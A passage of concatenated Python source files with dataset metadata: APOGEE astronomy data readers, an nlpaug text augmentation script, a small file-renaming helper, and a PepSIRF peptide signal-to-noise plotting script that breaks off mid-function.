OUTPUT:\n allVisit data\n HISTORY:\n 2013-11-07 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.allVisitPath()\n if not os.path.exists(filePath):\n download.allVisit()\n #read allVisit file\n data= fitsio.read(path.allVisitPath())\n if raw: return data\n #Some cuts\n if rmcommissioning:\n indx= numpy.array(['apogee.n.c'.encode('utf-8') in s for s in data['VISIT_ID']])\n indx+= numpy.array(['apogee.s.c'.encode('utf-8') in s for s in data['VISIT_ID']])\n data= data[True^indx]\n if main:\n indx= mainIndx(data)\n data= data[indx]\n if akvers.lower() == 'targ':\n aktag= 'AK_TARG'\n elif akvers.lower() == 'wise':\n aktag= 'AK_WISE'\n if ak:\n data= data[True^numpy.isnan(data[aktag])]\n data= data[(data[aktag] > -50.)]\n if plateInt or plateS4:\n #If plate is a string, cast it as an integer\n if isinstance(data['PLATE'][0],str):\n #First cast the special plates as -1\n plateDtype= data['PLATE'].dtype\n data['PLATE'][data['PLATE'] == 'calibration'.ljust(int(str(plateDtype)[2:]))]= '-1'\n data['PLATE'][data['PLATE'] == 'hip'.ljust(int(str(plateDtype)[2:]))]= '-1'\n data['PLATE'][data['PLATE'] == 'misc'.ljust(int(str(plateDtype)[2:]))]= '-1'\n data['PLATE'][data['PLATE'] == 'moving_groups'.ljust(int(str(plateDtype)[2:]))]= -1\n data['PLATE'][data['PLATE'] == 'rrlyr'.ljust(int(str(plateDtype)[2:]))]= '-1'\n #Now change the dtype to make plate an int\n dt= data.dtype\n dt= dt.descr\n plateDtypeIndx= dt.index(('PLATE', '|S13'))\n if plateInt:\n dt[plateDtypeIndx]= (dt[plateDtypeIndx][0],'int')\n elif plateS4:\n dt[plateDtypeIndx]= (dt[plateDtypeIndx][0],'|S4')\n dt= numpy.dtype(dt)\n data= data.astype(dt)\n #Add dereddened J, H, and Ks\n aj= data[aktag]*2.5\n ah= data[aktag]*1.55\n if _ESUTIL_LOADED:\n data= esutil.numpy_util.add_fields(data,[('J0', float),\n ('H0', float),\n ('K0', float)])\n data['J0']= data['J']-aj\n data['H0']= data['H']-ah\n data['K0']= data['K']-data[aktag]\n data['J0'][(data[aktag] <= -50.)]= -9999.9999\n data['H0'][(data[aktag] <= -50.)]= -9999.9999\n data['K0'][(data[aktag] <= -50.)]= -9999.9999\n else:\n warnings.warn(\"Extinction-corrected J,H,K not added because esutil is not installed\",RuntimeWarning) \n return data\n \ndef apokasc(rmcommissioning=True,\n main=False):\n \"\"\"\n NAME:\n apokasc\n PURPOSE:\n read the APOKASC data\n INPUT:\n rmcommissioning= (default: True) if True, only use data obtained after commissioning\n main= (default: False) if True, only select stars in the main survey\n OUTPUT:\n APOKASC data\n HISTORY:\n 2013-10-01 - Written - Bovy (IAS)\n \"\"\"\n if not _ESUTIL_LOADED:\n raise ImportError(\"apogee.tools.read.apokasc function requires the esutil module for catalog matching\")\n #read allStar file\n data= allStar(rmcommissioning=rmcommissioning,main=main,adddist=False,\n rmdups=False)\n #read the APOKASC file\n kascdata= fitsio.read(path.apokascPath())\n #Match these two\n h=esutil.htm.HTM()\n m1,m2,d12 = h.match(kascdata['RA'],kascdata['DEC'],\n data['RA'],data['DEC'],\n 2./3600.,maxmatch=1)\n data= data[m2]\n kascdata= kascdata[m1]\n kascdata= esutil.numpy_util.add_fields(kascdata,[('J0', float),\n ('H0', float),\n ('K0', float),\n ('APOGEE_TARGET1','>i4'),\n ('APOGEE_TARGET2','>i4'),\n ('APOGEE_ID', 'S18'),\n ('LOGG', float),\n ('TEFF', float),\n ('METALS', float),\n ('ALPHAFE', float),\n ('FNFE', float),\n ('FCFE', float)])\n kascdata['J0']= data['J0']\n kascdata['H0']= data['H0']\n kascdata['K0']= data['K0']\n kascdata['APOGEE_ID']= data['APOGEE_ID']\n kascdata['APOGEE_TARGET1']= data['APOGEE_TARGET1']\n kascdata['APOGEE_TARGET2']= data['APOGEE_TARGET2']\n kascdata['LOGG']= data['LOGG']\n kascdata['TEFF']= data['TEFF']\n kascdata['METALS']= data['METALS']\n kascdata['ALPHAFE']= data['ALPHAFE']\n kascdata['FNFE']= data['FPARAM'][:,5]\n kascdata['FCFE']= data['FPARAM'][:,4]\n return kascdata\n\ndef rcsample(main=False,dr=None):\n \"\"\"\n NAME:\n rcsample\n PURPOSE:\n read the rcsample file\n INPUT:\n main= (default: False) if True, only select stars in the main survey\n dr= data reduction to load the catalog for (automatically set based on APOGEE_REDUX if not given explicitly)\n OUTPUT:\n rcsample data\n HISTORY:\n 2013-10-08 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.rcsamplePath(dr=dr)\n if not os.path.exists(filePath):\n download.rcsample(dr=dr)\n #read rcsample file\n data= fitsio.read(path.rcsamplePath(dr=dr))\n #Some cuts\n if main:\n indx= mainIndx(data)\n data= data[indx]\n return data\n \ndef obslog(year=None):\n \"\"\"\n NAME:\n obslog\n PURPOSE:\n read the observation summary up to a certain year\n INPUT:\n year= read up to this year (None)\n OUTPUT:\n observation log\n HISTORY:\n 2013-11-04 - Written - Bovy (IAS)\n \"\"\"\n obslogfilename= path.obslogPath(year=year)\n if not os.path.exists(obslogfilename):\n download.obslog(year=year)\n genfromtxtKwargs= {'delimiter':'|',\n 'dtype':[('Fieldname','S14'),\n ('LocID','int'),\n ('ra','float'),\n ('dec','float'),\n ('Plate','int'),\n ('A_ver','S14'),\n ('DrilledHA','float'),\n ('HDB','int'),\n ('NObs_Plan','int'),\n ('NObs_Done','int'),\n ('NObs_Ver_Plan','int'),\n ('NObs_Ver_Done','int'),\n ('Total_SN','float'),\n ('Red_SN','float'),\n ('ManPriority','int'),\n ('Priority','float'),\n ('Time','float'),\n ('Shared','int'),\n ('Stars','int'),\n ('At_APO','int'),\n ('Reduction','int'),\n ('ObsHistory','S50'),\n ('UNKNOWN','S50'),\n ('UNKNOWN1','int'),\n ('UNKNOWN2','int'),\n ('ReductionHistory','S50')],\n 'skip_footer':1}\n if int(numpy.__version__.split('.')[0]) < 1 \\\n or int(numpy.__version__.split('.')[1]) < 10:\n genfromtxtKwargs['skiprows']= 2\n else:\n genfromtxtKwargs['skip_header']= 2\n obslogtxt= numpy.genfromtxt(obslogfilename,**genfromtxtKwargs)\n return obslogtxt\n\ndef apogeePlate(dr=None):\n \"\"\"\n NAME:\n apogeePlate\n PURPOSE:\n read the apogeePlate file\n INPUT:\n dr= return the file corresponding to this data release\n OUTPUT:\n apogeePlate file\n HISTORY:\n 2013-11-04 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.apogeePlatePath(dr=dr)\n if not os.path.exists(filePath):\n download.apogeePlate(dr=dr)\n return fitsio.read(filePath)\n\ndef apogeeDesign(dr=None):\n \"\"\"\n NAME:\n apogeeDesign\n PURPOSE:\n read the apogeeDesign file\n INPUT:\n dr= return the file corresponding to this data release\n OUTPUT:\n apogeeDesign file\n HISTORY:\n 2013-11-04 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.apogeeDesignPath(dr=dr)\n if not os.path.exists(filePath):\n download.apogeeDesign(dr=dr)\n return fitsio.read(filePath)\n\ndef apogeeField(dr=None):\n \"\"\"\n NAME:\n apogeeField\n PURPOSE:\n read the apogeeField file\n INPUT:\n dr= return the file corresponding to this data release\n OUTPUT:\n apogeeField file\n HISTORY:\n 2013-11-04 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.apogeeFieldPath(dr=dr)\n if not os.path.exists(filePath):\n download.apogeeField(dr=dr)\n return fitsio.read(filePath)\n\ndef apogeeObject(field_name,dr=None,\n ak=True,\n akvers='targ'):\n \"\"\"\n NAME:\n apogeePlate\n PURPOSE:\n read the apogeePlate file\n INPUT:\n field_name - name of the field\n dr= return the file corresponding to this data release\n ak= (default: True) only use objects for which dereddened mags exist\n akvers= 'targ' (default) or 'wise': use target AK (AK_TARG) or AK derived from all-sky WISE (AK_WISE)\n OUTPUT:\n apogeeObject file\n HISTORY:\n 2013-11-04 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.apogeeObjectPath(field_name,dr=dr)\n if not os.path.exists(filePath):\n download.apogeeObject(field_name,dr=dr)\n data= fitsio.read(filePath)\n if akvers.lower() == 'targ':\n aktag= 'AK_TARG'\n elif akvers.lower() == 'wise':\n aktag= 'AK_WISE'\n if ak:\n data= data[True^numpy.isnan(data[aktag])]\n data= data[(data[aktag] > -50.)]\n #Add dereddened J, H, and Ks\n aj= data[aktag]*2.5\n ah= data[aktag]*1.55\n if _ESUTIL_LOADED: \n data= esutil.numpy_util.add_fields(data,[('J0', float),\n ('H0', float),\n ('K0', float)])\n data['J0']= data['J']-aj\n data['H0']= data['H']-ah\n data['K0']= data['K']-data[aktag]\n data['J0'][(data[aktag] <= -50.)]= -9999.9999\n data['H0'][(data[aktag] <= -50.)]= -9999.9999\n data['K0'][(data[aktag] <= -50.)]= -9999.9999\n else:\n warnings.warn(\"Extinction-corrected J,H,K not added because esutil is not installed\",RuntimeWarning) \n return data\n\n@specOnAspcapWavegrid\ndef aspcapStar(loc_id,apogee_id,ext=1,dr=None,header=True,\n aspcapWavegrid=False):\n \"\"\"\n NAME:\n aspcapStar\n PURPOSE:\n Read an aspcapStar file for a given star\n INPUT:\n loc_id - location ID (field for 1m targets)\n apogee_id - APOGEE ID of the star\n ext= (1) extension to load\n header= (True) if True, also return the header\n dr= return the path corresponding to this data release (general default)\n aspcapWavegrid= (False) if True, output the spectrum on the ASPCAP \n wavelength grid\n OUTPUT:\n aspcapStar file or (aspcapStar file, header)\n HISTORY:\n 2014-11-25 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.aspcapStarPath(loc_id,apogee_id,dr=dr)\n if not os.path.exists(filePath):\n download.aspcapStar(loc_id,apogee_id,dr=dr)\n data= fitsio.read(filePath,ext,header=header)\n return data\n\n@specOnAspcapWavegrid\ndef apStar(loc_id,apogee_id,ext=1,dr=None,header=True,aspcapWavegrid=False):\n \"\"\"\n NAME:\n apStar\n PURPOSE:\n Read an apStar file for a given star\n INPUT:\n loc_id - location ID (field for 1m targets)\n apogee_id - APOGEE ID of the star\n ext= (1) extension to load\n header= (True) if True, also return the header\n dr= return the path corresponding to this data release (general default)\n aspcapWavegrid= (False) if True, output the spectrum on the ASPCAP \n wavelength grid\n OUTPUT:\n apStar file or (apStar file, header)\n HISTORY:\n 2015-01-13 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.apStarPath(loc_id,apogee_id,dr=dr)\n if not os.path.exists(filePath):\n download.apStar(loc_id,apogee_id,dr=dr)\n data= fitsio.read(filePath,ext,header=header)\n return data\n\ndef apVisit(loc_id, mjd, fiberid, ext=1, dr=None, header=True):\n \"\"\"\n NAME: apVisit\n PURPOSE: Read a single apVisit file for a given location, MJD, and fiber\n INPUT:\n loc_id = 4-digit location ID (field for 1m targets)\n mjd = 5-digit MJD\n fiberid = 3-digit fiber ID\n ext= (1) extension to load\n header= (True) if True, also return the header\n dr= return the path corresponding to this data release (general default)\n OUTPUT: \n header=False:\n 1D array with apVisit fluxes (ext=1)\n 1D array with apVisit flux errors (ext=2)\n corresponding wavelength grid (ext=4) **WARNING** SORTED FROM HIGH TO LOW WAVELENGTH !!!\n go here to learn about other extensions:\n https://data.sdss.org/datamodel/files/APOGEE_REDUX/APRED_VERS/TELESCOPE/PLATE_ID/MJD5/apVisit.html\n header=True:\n (3D array with three portions of whichever extension you specified, header)\n HISTORY: 2016-11 - Meredith Rawls\n TODO: automatically find all apVisit files for a given apogee ID and download them\n \"\"\"\n filePath = path.apVisitPath(loc_id, mjd, fiberid, dr=dr)\n if not os.path.exists(filePath):\n download.apVisit(loc_id, mjd, fiberid, dr=dr)\n data = fitsio.read(filePath, ext, header=header)\n if header == False: # stitch three chips together in increasing wavelength order\n data = data.flatten()\n data = numpy.flipud(data)\n return data\n\n@modelspecOnApStarWavegrid\ndef modelSpec(lib='GK',teff=4500,logg=2.5,metals=0.,\n cfe=0.,nfe=0.,afe=0.,vmicro=2.,\n dr=None,header=True,ext=234,apStarWavegrid=None,**kwargs):\n \"\"\"\n NAME:\n modelSpec\n PURPOSE:\n Read a model spectrum file\n INPUT:\n lib= ('GK') spectral library\n teff= (4500) grid-point Teff\n logg= (2.5) grid-point logg\n metals= (0.) grid-point metallicity\n cfe= (0.) grid-point carbon-enhancement\n nfe= (0.) grid-point nitrogen-enhancement\n afe= (0.) grid-point alpha-enhancement\n vmicro= (2.) grid-point microturbulence\n dr= return the path corresponding to this data release\n ext= (234) extension to load (if ext=234, the blue, green, and red spectra will be combined [onto the aspcapStar wavelength grid by default, just concatenated if apStarWavegrid=False), with NaN where there is no model)\n apStarWavegrid= (True) if False and ext=234, don't put the spectrum on the apStar wavelength grid, but just concatenate the blue, green, and red detector\n header= (True) if True, also return the header (not for ext=234)\n dr= return the path corresponding to this data release (general default)\n +download kwargs\n OUTPUT:\n model spectrum or (model spectrum file, header)\n HISTORY:\n 2015-01-13 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.modelSpecPath(lib=lib,teff=teff,logg=logg,metals=metals,\n cfe=cfe,nfe=nfe,afe=afe,vmicro=vmicro,dr=dr)\n if not os.path.exists(filePath):\n download.modelSpec(lib=lib,teff=teff,logg=logg,metals=metals,\n cfe=cfe,nfe=nfe,afe=afe,vmicro=vmicro,dr=dr,\n **kwargs)\n # Need to use astropy's fits reader, bc the file has issues\n import astropy.io.fits as apyfits\n from astropy.utils.exceptions import AstropyUserWarning\n import warnings\n warnings.filterwarnings('ignore',category=AstropyUserWarning)\n hdulist= apyfits.open(filePath)\n # Find index of nearest grid point in Teff, logg, and metals\n if dr is None: dr= path._default_dr()\n if dr == '12':\n logggrid= numpy.linspace(0.,5.,11)\n metalsgrid= numpy.linspace(-2.5,0.5,7)\n if lib.lower() == 'gk':\n teffgrid= numpy.linspace(3500.,6000.,11)\n teffIndx= numpy.argmin(numpy.fabs(teff-teffgrid))\n elif lib.lower() == 'f':\n teffgrid= numpy.linspace(5500.,8000.,11)\n teffIndx= numpy.argmin(numpy.fabs(teff-teffgrid))\n loggIndx= numpy.argmin(numpy.fabs(logg-logggrid))\n metalsIndx= numpy.argmin(numpy.fabs(metals-metalsgrid))\n if header and not ext == 234:\n return (hdulist[ext].data[metalsIndx,loggIndx,teffIndx],\n hdulist[ext].header)\n elif not ext == 234:\n return hdulist[ext].data[metalsIndx,loggIndx,teffIndx]\n else: #ext == 234, combine 2,3,4\n out= numpy.zeros(7214)\n out[:2920]= hdulist[2].data[metalsIndx,loggIndx,teffIndx]\n out[2920:5320]= hdulist[3].data[metalsIndx,loggIndx,teffIndx]\n out[5320:]= hdulist[4].data[metalsIndx,loggIndx,teffIndx]\n return out\n\ndef apWave(chip,ext=2,dr='13'):\n \"\"\"\n NAME:\n apWave\n PURPOSE:\n open an apWave file\n INPUT:\n chip - chip 'a', 'b', or 'c'\n ext= (2) extension to read\n dr= return the path corresponding to this data release \n OUTPUT:\n contents of HDU ext\n HISTORY:\n 2015-02-27 - Written - Bovy (IAS)\n \"\"\"\n filePath= path.apWavePath(chip,dr=dr)\n if not os.path.exists(filePath):\n download.apWave(chip,dr=dr)\n data= fitsio.read(filePath,ext)\n return data\n\ndef apLSF(chip,ext=0,dr=None):\n \"\"\"\n NAME:\n apLSF\n PURPOSE:\n open an apLSF file\n INPUT:\n chip - chip 'a', 'b', or 'c'\n ext= (0) extension to read\n dr= return the path corresponding to this data release\n OUTPUT:\n contents of HDU ext\n HISTORY:\n 2015-03-12 - Written - Bovy (IAS)\n \"\"\"\n \n filePath= path.apLSFPath(chip,dr=dr)\n if not os.path.exists(filePath):\n download.apLSF(chip,dr=dr)\n data= fitsread(filePath,ext)\n\n return data\n\ndef mainIndx(data):\n \"\"\"\n NAME:\n mainIndx\n PURPOSE:\n apply 'main' flag cuts and return the index of 'main' targets\n INPUT:\n data- data sample (with APOGEE_TARGET1 and APOGEE_TARGET2 flags)\n OUTPUT:\n index of 'main' targets in data\n HISTORY:\n 2013-11-19 - Written - Bovy (IAS)\n \"\"\"\n indx= (((data['APOGEE_TARGET1'] & 2**11) != 0)+((data['APOGEE_TARGET1'] & 2**12) != 0)+((data['APOGEE_TARGET1'] & 2**13) != 0))\\\n *((data['APOGEE_TARGET1'] & 2**7) == 0)\\\n *((data['APOGEE_TARGET1'] & 2**8) == 0)\\\n *((data['APOGEE_TARGET2'] & 2**9) == 0)\n #*((data['APOGEE_TARGET1'] & 2**17) == 0)\\\n return indx\n\ndef remove_duplicates(data):\n \"\"\"\n NAME:\n remove_duplicates\n PURPOSE:\n remove duplicates from an array\n INPUT:\n data - array\n OUTPUT:\n array w/ duplicates removed\n HISTORY:\n 2014-06-23 - Written - Bovy (IAS)\n \"\"\"\n if not _ESUTIL_LOADED:\n raise ImportError(\"apogee.tools.read.remove_duplicates function requires the esutil module for catalog matching\")\n tdata= copy.copy(data)\n #Match the data against itself\n if _ESUTIL_VERSION[1] >= 5 and _ESUTIL_VERSION >= 3:\n h= esutil.htm.Matcher(10,data['RA'],data['DEC'])\n m1,m2,d12 = h.match(data['RA'],data['DEC'],\n 2./3600.,maxmatch=0) #all matches\n else:\n h=esutil.htm.HTM()\n htmrev2,minid,maxid = h.match_prepare(data['RA'],data['DEC'])\n m1,m2,d12 = h.match(data['RA'],data['DEC'],\n data['RA'],data['DEC'],\n 2./3600.,maxmatch=0, #all matches\n htmrev2=htmrev2,minid=minid,maxid=maxid)\n sindx= numpy.argsort(m1)\n sm1= m1[sindx]\n dup= sm1[1:] == sm1[:-1]\n for d in tqdm.tqdm(sm1[:-1][dup]):\n #Find the matches for just this duplicate\n if _ESUTIL_VERSION[1] >= 5 and _ESUTIL_VERSION >= 3:\n nm1,nm2,nd12= h.match(data['RA'][d],data['DEC'][d],\n 2./3600.,maxmatch=0) #all matches\n else:\n nm1,nm2,nd12= h.match(data['RA'][d],data['DEC'][d],\n data['RA'],data['DEC'],\n 2./3600.,maxmatch=0, #all matches\n htmrev2=htmrev2,minid=minid,maxid=maxid)\n #If some matches are commissioning data or have bad ak, rm from consideration\n comindx= numpy.array(['apogee.n.c'.encode('utf-8') in s for s in data['APSTAR_ID'][nm2]])\n comindx+= numpy.array(['apogee.s.c'.encode('utf-8') in s for s in data['APSTAR_ID'][nm2]])\n goodak= (True^numpy.isnan(data['AK_TARG'][nm2]))\\\n *(data['AK_TARG'][nm2] > -50.)\n hisnr= numpy.argmax(data['SNR'][nm2]*(True^comindx)*goodak) #effect. make com zero SNR\n if numpy.amax(data['SNR'][nm2]*(True^comindx)*goodak) == 0.: #all commissioning or bad ak, treat all equally\n hisnr= numpy.argmax(data['SNR'][nm2])\n tindx= numpy.ones(len(nm2),dtype='bool')\n tindx[hisnr]= False\n tdata['RA'][nm2[tindx]]= -9999\n return tdata[tdata['RA'] != -9999]\n\n","repo_name":"jbirky/apogee_tools","sub_path":"apogee_tools/apogee_hack/tools/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":33573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"73471468353","text":"################################################################################\n# Imports\n################################################################################\nimport os\nimport re\nimport pandas as pd\nimport numpy as np\nimport argparse\nimport nlpaug.augmenter.char as nac\nfrom tqdm import tqdm\n\n\n################################################################################\n# Parameters\n################################################################################\nap = argparse.ArgumentParser()\nap.add_argument(\"--input\", required=True, type=str,\n help=\"input file of unaugmented data\")\nap.add_argument(\"--da_type\", required=True, type=str,\n help=\"The types of data augmentations wanted out of \" +\n \"{ocr, key, randin, randsub, randswap, randdel}\")\nap.add_argument(\"--num_aug\", default=1, required=False, type=int,\n help=\"number of augmented sentences per original sentence\")\nap.add_argument(\"--alpha\", default=.25, required=False, type=float,\n help=\"percent of words in each sentence to be changed\")\nap.add_argument(\"--alpha_char\", default=.25, required=False, type=float,\n help=\"percent of characters in each word to be changed\")\nap.add_argument(\"--output_dir\", default='./', required=False, type=str,\n help=\"directory to save output\")\nargs = ap.parse_args()\n\n\n################################################################################\n# Helper Functions\n################################################################################\ndef get_only_chars(line):\n clean_line = \"\"\n\n line = line.replace(\"’\", \"\")\n line = line.replace(\"'\", \"\")\n line = line.replace(\"-\", \" \") # replace hyphens with spaces\n line = line.replace(\"\\t\", \" \")\n line = line.replace(\"\\n\", \" \")\n line = line.lower()\n\n for char in line:\n if char in 'qwertyuiopasdfghjklzxcvbnm 1234567890#':\n clean_line += char\n else:\n clean_line += ' '\n\n clean_line = re.sub(' +', ' ', clean_line) # delete extra spaces\n if clean_line[0] == ' ':\n clean_line = clean_line[1:]\n return clean_line\n\n\n################################################################################\n# Character-Level Augmentation Functions\n################################################################################\n# Optical character augmentation\ndef ocr_aug(sentence, a_c,\n a_w, n):\n aug = nac.OcrAug(aug_char_p=a_c, aug_word_p=a_w)\n aug_sentences = aug.augment(sentence, n=n)\n if type(aug_sentences) == list:\n return aug_sentences\n else:\n return [aug_sentences]\n\n\n# Keyboard distance augmentation\ndef key_aug(sentence, a_c,\n a_w, n):\n aug = nac.KeyboardAug(aug_char_p=a_c, aug_word_p=a_w)\n aug_sentences = aug.augment(sentence, n=n)\n if type(aug_sentences) == list:\n return aug_sentences\n else:\n return [aug_sentences]\n\n\n# Random augmentation\ndef rand_aug(sentence, action, a_c,\n a_w, n):\n aug = nac.RandomCharAug(action=action, aug_char_p=a_c, aug_word_p=a_w)\n aug_sentences = aug.augment(sentence, n=n)\n if type(aug_sentences) == list:\n return aug_sentences\n else:\n return [aug_sentences]\n\n\n################################################################################\n# Top Level Augmentation Functions\n################################################################################\n# Augment a single example\ndef augment(sentence, da, alpha, num_aug, alpha_char):\n sentence = get_only_chars(sentence)\n augmented_sentences = []\n num_new_per_technique = int(np.ceil(num_aug / len(da)))\n\n # Character Level\n if 'ocr' in da:\n augmented_sentences += ocr_aug(sentence, a_c=alpha_char,\n a_w=alpha, n=num_new_per_technique)\n if 'key' in da:\n augmented_sentences += key_aug(sentence, a_c=alpha_char,\n a_w=alpha, n=num_new_per_technique)\n if 'rand_in' in da:\n augmented_sentences += rand_aug(sentence, 'insert', a_c=alpha_char,\n a_w=alpha, n=num_new_per_technique)\n if 'rand_sub' in da:\n augmented_sentences += rand_aug(sentence, 'sub', a_c=alpha_char,\n a_w=alpha, n=num_new_per_technique)\n if 'rand_swap' in da:\n augmented_sentences += rand_aug(sentence, 'swap', a_c=alpha_char,\n a_w=alpha, n=num_new_per_technique)\n if 'rand_del' in da:\n augmented_sentences += rand_aug(sentence, 'delete', a_c=alpha_char,\n a_w=alpha, n=num_new_per_technique)\n\n # Remove excess examples\n augmented_sentences = [get_only_chars(sentence) for sentence in augmented_sentences]\n np.random.shuffle(augmented_sentences)\n if len(da) >= 1:\n augmented_sentences = augmented_sentences[:num_aug]\n\n if len(augmented_sentences) < num_aug:\n augmented_sentences += [sentence]*(num_aug-len(augmented_sentences))\n\n # Return\n return augmented_sentences\n\n\n# Augmenta all data\ndef gen_nlpaug(train_orig, output_file, da_type, alpha=0.1, alpha_char=0.25, num_aug=5):\n # get data\n data = pd.read_csv(train_orig)\n targets = data['target'].values\n texts = data['text'].values\n # initialize output data\n new_targets = np.zeros(num_aug * len(targets), dtype=int)\n new_texts = np.empty(num_aug * len(targets), dtype=object)\n\n for i, target in enumerate(tqdm(targets)):\n sentence = texts[i]\n # AUGMENT\n aug_sentences = augment(sentence, da_type,\n alpha=alpha, num_aug=num_aug, alpha_char=alpha_char)\n\n # Add to output\n new_targets[(num_aug * i):num_aug * (i + 1)] = [target] * num_aug\n new_texts[(num_aug * i):num_aug * (i + 1)] = aug_sentences\n\n # Concatenate our list\n output_targets = np.concatenate((targets, new_targets))\n output_texts = np.concatenate((texts, new_texts))\n\n # Create new dataframe and export into a csv\n new_data = pd.DataFrame({'target': output_targets, 'text': output_texts})\n new_data.to_csv(output_file, index=False)\n\n\n################################################################################\n# Main\n################################################################################\nif __name__ == \"__main__\":\n da_type = args.da_type.split('_')\n join_char = \"_\"\n output = str(args.output_dir) + join_char.join(da_type) + \"_alpha_\" + str(args.alpha)\n output += \"_alpha_char_\" + str(args.alpha_char)\n output += \"_num_aug_\" + str(args.num_aug) + \".csv\"\n\n gen_nlpaug(args.input, output, da_type, alpha=args.alpha,\n alpha_char=args.alpha_char, num_aug=args.num_aug)\n","repo_name":"dkang9503/CS224N_WIN20","sub_path":"utils/aug2_scripts/char_aug_script.py","file_name":"char_aug_script.py","file_ext":"py","file_size_in_byte":6800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24368189667","text":"def remove_py_extension(input_file_path, output_file_path):\r\n with open(input_file_path, 'r') as input_file:\r\n lines = input_file.readlines()\r\n\r\n # Remove the '.py' extension from each line\r\n lines_without_py = [line.strip()[:-3] for line in lines]\r\n\r\n # Save the modified lines to the output file\r\n with open(output_file_path, 'w') as output_file:\r\n output_file.write(\"\\n\".join(lines_without_py))\r\n\r\n# Step 1: Define the path to the input file.txt\r\ninput_file_path = 'valide_testfiles.txt'\r\n\r\n# Step 2: Define the path to the output file without .py extension\r\noutput_file_path = 'file_without_py_extension.txt'\r\n\r\n# Step 3: Remove .py extension and save to the output file\r\nremove_py_extension(input_file_path, output_file_path)\r\n","repo_name":"yassinhamed/stage-stet","sub_path":"file_without_py_extension.py","file_name":"file_without_py_extension.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73708405634","text":"#!/usr/bin/env python\n\nimport matplotlib.pyplot as plt\nimport matplotlib as mpl\nmpl.rcParams['pdf.fonttype'] = 42\n\nimport optparse\nimport numpy as np\nimport statistics as stat\n\n# The goal of this script is to plot bin-level differences in norm counts for enriched peptides vs. background, in order to estimate relative levels of signal-to-noise across samples and runs\n\ncolors = ['#8dd3c7','#bebada','#fb8072','#80b1d3','#fdb462','#b3de69','#fccde5','#d9d9d9','#bc80bd','#ffffb3']\n\ndef main():\n usage = '%prog [options]'\n p = optparse.OptionParser()\n p.add_option('-i', '--input', help='Tab-delimited input file, with one row per input matrix. The first column should contain a simple string to be used in output to refer to this file. The second column should be a score matrix that will be used to make plots [None, REQ]')\n p.add_option('-b', '--bins', help='Bin file, in the format generated by the PepSIRF bin module. [None, REQ]')\n p.add_option('-u', '--upper', type=\"int\", help=\"Upper percentile to use to calculate average value for 'signal'. Must be between 0 and 100, inclusive. [None, REQ]\")\n p.add_option('-l', '--lower', type=\"int\", help=\"Lower percentile to use to calculate average value for 'noise'. Must be between 0 and 100, inclusive. [None, REQ]\")\n p.add_option('-o', '--out', help='Base name for output files. [None, REQ]')\n p.add_option('--fig', default=\"png\", help=\"Figure format to output.\")\n p.add_option('--width', default=15, type=int, help=\"Figure width. [15]\")\n p.add_option('--height', default=4, type=int, help=\"Figure height. [4]\")\n\n# p.add_option('--hpd', type=\"float\", help=\"Highest posterior density to use for calculation of mean and standard deviation. Must be between 0 and 1. [None, REQ]\")\n\n opts, args = p.parse_args()\n \n # Read in bins\n bins = readGroups(opts.bins)\n \n # Open figure \n fig,ax = plt.subplots(1,1,figsize=(opts.width, opts.height),facecolor='w')\n\n \n # Open output file for writing\n with open(\"%s.tsv\" % (opts.out), \"w\") as fout:\n #Write header for output file\n fout.write(\"Sample\\tFile\\tBin\\tUpper%d\\tLower%d\\tDifference\\n\" % (opts.upper, opts.lower))\n \n #Step through each score matrix file\n matCount=-1\n with open(opts.input, \"r\") as fin:\n for line in fin:\n matCount+=1\n fileStr,fileLoc = line.rstrip(\"\\n\").split(\"\\t\")\n \n # Read in matrix\n sD = parseCounts(fileLoc)\n \n \n for samp, cD in sD.items():\n\n # Create list to collect all bin diffs\n diffL = []\n\n for i, g in enumerate(bins):\n counts=[cD[each] for each in g]\n lo,hi = np.percentile(counts, [opts.lower, opts.upper])\n# lo,hi=get_hpd(counts,opts.hpd)\n\n upperVals = [x for x in counts if x>=hi]\n lowerVals = [x for x in counts if x<=lo]\n \n upAvg = np.mean(upperVals)\n loAvg = np.mean(lowerVals)\n \n diff = upAvg-loAvg\n diffL.append(diff)\n \n fout.write(\"%s\\t%s\\t%d\\t%.5f\\t%.5f\\t%.5f\\n\" % (samp, fileStr, i, upAvg, loAvg, diff))\n \n # Add line to plot\n ax.plot(list(range(len(diffL))), diffL, c=colors[matCount], label=fileStr, alpha=0.5)\n \n fig.legend()\n fig.savefig(\"%s.%s\" % (opts.out, opts.fig),dpi=300,bbox_inches='tight')\n\n#----------------------End of main()\n\n\ndef readGroups(file):\n g=[]\n with open(file, \"r\") as fin:\n for line in fin:\n cols=line.rstrip(\"\\n\").split(\"\\t\")\n if cols:\n g.append(cols)\n return g\n\n\ndef writeCounts(cd, outname):\n probeNames = sorted(cd[list(cd.keys())[0]].keys())\n sampNames = sorted(list(cd.keys()))\n with open(outname, \"w\") as fout:\n fout.write(\"Probe\\t%s\\n\" % (\"\\t\".join(sampNames)))\n for each in probeNames:\n fout.write(\"%s\\t%s\\n\" % (each, \"\\t\".join([str(cd[x][each]) for x in sampNames])))\n\n\ndef parseCounts(countFile, delim=\"\\t\"):\n counts={}\n with open(countFile, \"r\") as fin:\n lc=0\n for line in fin:\n lc+=1\n cols=line.rstrip(\"\\n\").split(delim)\n if lc == 1:\n names = cols[1:]\n for n in names:\n counts[n]={}\n else:\n for i, count in enumerate(cols[1:]):\n counts[names[i]][cols[0]] = float(count)\n return counts\n\n\ndef get_hpd(data, level):\n \"\"\"\n Return highest posterior density interval from a list,\n given the percent posterior density interval required.\n \"\"\"\n d = list(data)\n d.sort()\n\n nData = len(data)\n nIn = int(round(level * nData))\n if nIn < 2 :\n return None\n #raise RuntimeError(\"Not enough data. N data: %s\"%(len(data)))\n \n i = 0\n r = d[i+nIn-1] - d[i]\n for k in range(len(d) - (nIn - 